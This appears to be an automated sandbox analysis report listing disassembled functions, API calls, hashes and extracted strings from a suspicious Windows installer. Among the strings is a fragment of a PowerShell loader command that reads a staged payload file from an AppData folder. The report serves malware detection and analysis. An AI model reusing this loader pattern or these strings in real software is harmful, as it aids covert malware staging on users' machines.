                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                                                                • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                                                                Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileString
                                                                                                • String ID:
                                                                                                • API String ID: 1096422788-0
                                                                                                • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                                • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                                                                • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                                • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                                                                Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                                                • Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
                                                                                                • Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                                                • Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E
                                                                                                Function 00403FE1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                                                                • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                                                                Function 00403FCA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                                                • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                                                Function 00403192 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                Function 00403FB7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                                                • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08

                                                                                                Non-executed Functions

                                                                                                Function 00404976 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                                                                • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                                                                • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                                                                • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                                                                • ShowWindow.USER32(00000000), ref: 00404F57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                                • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                                                                • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                                • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                                                                Function 00404430 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                                                                • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                                                                  • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                  • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                                                                Strings
                                                                                                • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                                                                • "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets, xrefs: 00404449
                                                                                                • A, xrefs: 00404553
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                                                                • API String ID: 2246997448-1348262891
                                                                                                • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                                • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                                                                • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                                • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                                                                Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic, xrefs: 004020F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
